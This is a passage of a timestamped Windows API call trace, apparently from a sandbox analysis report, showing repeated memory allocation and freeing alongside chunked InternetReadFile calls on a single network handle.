dwFreeType=0x4000) returned 1 [0122.877] VirtualAlloc (lpAddress=0x4b54000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b54000 [0122.881] VirtualFree (lpAddress=0x4b20000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.887] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.887] VirtualAlloc (lpAddress=0x4b88000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b88000 [0122.888] VirtualFree (lpAddress=0x4b84000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.892] VirtualFree (lpAddress=0x4b50000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.894] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.895] VirtualFree (lpAddress=0x4b80000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.895] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0122.899] VirtualFree (lpAddress=0x4b88000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.902] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.903] VirtualAlloc (lpAddress=0x4b54000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b54000 [0122.908] VirtualFree (lpAddress=0x4b20000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.910] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.911] VirtualAlloc (lpAddress=0x4b88000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b88000 [0122.912] VirtualFree (lpAddress=0x4b84000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.997] VirtualFree (lpAddress=0x4b50000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0122.999] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0122.999] VirtualFree (lpAddress=0x4b80000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.000] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.003] VirtualFree (lpAddress=0x4b88000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0123.006] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.006] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.007] VirtualAlloc (lpAddress=0x4b54000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b54000 [0123.010] VirtualFree (lpAddress=0x4b20000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0123.013] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.013] VirtualAlloc (lpAddress=0x4b88000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b88000 [0123.014] VirtualFree (lpAddress=0x4b84000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.018] VirtualFree (lpAddress=0x4b50000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0123.020] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.020] VirtualFree (lpAddress=0x4b80000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.020] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.024] VirtualFree (lpAddress=0x4b88000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0123.027] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.027] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.028] VirtualAlloc (lpAddress=0x4b54000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b54000 [0123.032] VirtualFree (lpAddress=0x4b20000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0123.037] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.037] VirtualAlloc (lpAddress=0x4b88000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b88000 [0123.042] VirtualFree (lpAddress=0x4b50000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.044] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.045] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.049] VirtualFree (lpAddress=0x4b84000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.052] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.052] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.055] VirtualAlloc (lpAddress=0x4b54000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b54000 [0123.058] VirtualFree (lpAddress=0x4b20000, dwSize=0x30000, dwFreeType=0x4000) returned 1 [0123.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.061] VirtualAlloc (lpAddress=0x4b88000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b88000 [0123.065] VirtualFree (lpAddress=0x4b50000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.066] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.067] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.071] VirtualFree (lpAddress=0x4b84000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.075] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.075] VirtualAlloc (lpAddress=0x4b54000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b54000 [0123.075] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.075] VirtualFree (lpAddress=0x4bb8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.078] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0123.088] VirtualFree (lpAddress=0x4b20000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.094] VirtualAlloc (lpAddress=0x4b90000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b90000 [0123.095] VirtualFree (lpAddress=0x4b8c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.102] VirtualFree (lpAddress=0x4b54000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.107] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.107] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.107] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.113] VirtualFree (lpAddress=0x4b90000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.117] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.117] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.118] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0123.124] VirtualFree (lpAddress=0x4b20000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.128] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.129] VirtualAlloc (lpAddress=0x4b90000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b90000 [0123.130] VirtualFree (lpAddress=0x4b8c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.136] VirtualFree (lpAddress=0x4b54000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.138] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.138] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.139] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.144] VirtualFree (lpAddress=0x4b90000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.148] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.148] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.149] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0123.154] VirtualFree (lpAddress=0x4b20000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.157] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.158] VirtualAlloc (lpAddress=0x4b90000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b90000 [0123.159] VirtualFree (lpAddress=0x4b8c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.164] VirtualFree (lpAddress=0x4b54000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.167] VirtualFree (lpAddress=0x4b88000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.167] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.174] VirtualFree (lpAddress=0x4b90000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.177] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.177] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.178] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0123.184] VirtualFree (lpAddress=0x4b20000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.187] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.188] VirtualAlloc (lpAddress=0x4b90000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b90000 [0123.194] VirtualFree (lpAddress=0x4b54000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.196] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.196] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.201] VirtualFree (lpAddress=0x4b8c000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.205] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.205] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.207] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0123.216] VirtualFree (lpAddress=0x4b20000, dwSize=0x34000, dwFreeType=0x4000) returned 1 [0123.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.219] VirtualAlloc (lpAddress=0x4b90000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b90000 [0123.222] VirtualFree (lpAddress=0x4b54000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.224] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.224] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x38000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.228] VirtualFree (lpAddress=0x4b8c000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.231] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.232] VirtualAlloc (lpAddress=0x4b58000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b58000 [0123.232] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.232] VirtualFree (lpAddress=0x4bc4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.236] VirtualAlloc (lpAddress=0x4b5c000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b5c000 [0123.239] VirtualFree (lpAddress=0x4b20000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.242] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.242] VirtualAlloc (lpAddress=0x4b98000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b98000 [0123.243] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.248] VirtualFree (lpAddress=0x4b58000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.250] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.251] VirtualFree (lpAddress=0x4b90000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.251] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.255] VirtualFree (lpAddress=0x4b98000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.259] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.259] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.259] VirtualAlloc (lpAddress=0x4b5c000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b5c000 [0123.264] VirtualFree (lpAddress=0x4b20000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.268] VirtualAlloc (lpAddress=0x4b98000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b98000 [0123.269] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.276] VirtualFree (lpAddress=0x4b58000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.278] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.278] VirtualFree (lpAddress=0x4b90000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.279] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.283] VirtualFree (lpAddress=0x4b98000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.287] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.287] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.288] VirtualAlloc (lpAddress=0x4b5c000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b5c000 [0123.292] VirtualFree (lpAddress=0x4b20000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.297] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.297] VirtualAlloc (lpAddress=0x4b98000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b98000 [0123.299] VirtualFree (lpAddress=0x4b94000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.309] VirtualFree (lpAddress=0x4b58000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.311] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.312] VirtualFree (lpAddress=0x4b90000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.312] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.317] VirtualFree (lpAddress=0x4b98000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.321] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.321] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.322] VirtualAlloc (lpAddress=0x4b5c000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b5c000 [0123.326] VirtualFree (lpAddress=0x4b20000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.330] VirtualAlloc (lpAddress=0x4b98000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b98000 [0123.335] VirtualFree (lpAddress=0x4b58000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.337] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.337] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.342] VirtualFree (lpAddress=0x4b94000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.347] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.347] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.350] VirtualAlloc (lpAddress=0x4b5c000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b5c000 [0123.356] VirtualFree (lpAddress=0x4b20000, dwSize=0x38000, dwFreeType=0x4000) returned 1 [0123.359] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.360] VirtualAlloc (lpAddress=0x4b98000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b98000 [0123.365] VirtualFree (lpAddress=0x4b58000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.367] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.367] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x3c000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.372] VirtualFree (lpAddress=0x4b94000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.377] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.377] VirtualAlloc (lpAddress=0x4b5c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b5c000 [0123.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.378] VirtualFree (lpAddress=0x4bd0000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.380] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0123.387] VirtualFree (lpAddress=0x4b20000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.390] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.391] VirtualAlloc (lpAddress=0x4ba0000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4ba0000 [0123.392] VirtualFree (lpAddress=0x4b9c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.410] VirtualFree (lpAddress=0x4b5c000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.413] VirtualFree (lpAddress=0x4b98000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.413] VirtualAlloc (lpAddress=0x4b20000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b20000 [0123.418] VirtualFree (lpAddress=0x4ba0000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.422] VirtualFree (lpAddress=0x4bdc000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0123.423] VirtualAlloc (lpAddress=0x4b60000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b60000 [0123.427] VirtualFree (lpAddress=0x4b20000, dwSize=0x3c000, dwFreeType=0x4000) returned 1 [0123.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0123.433] VirtualAlloc 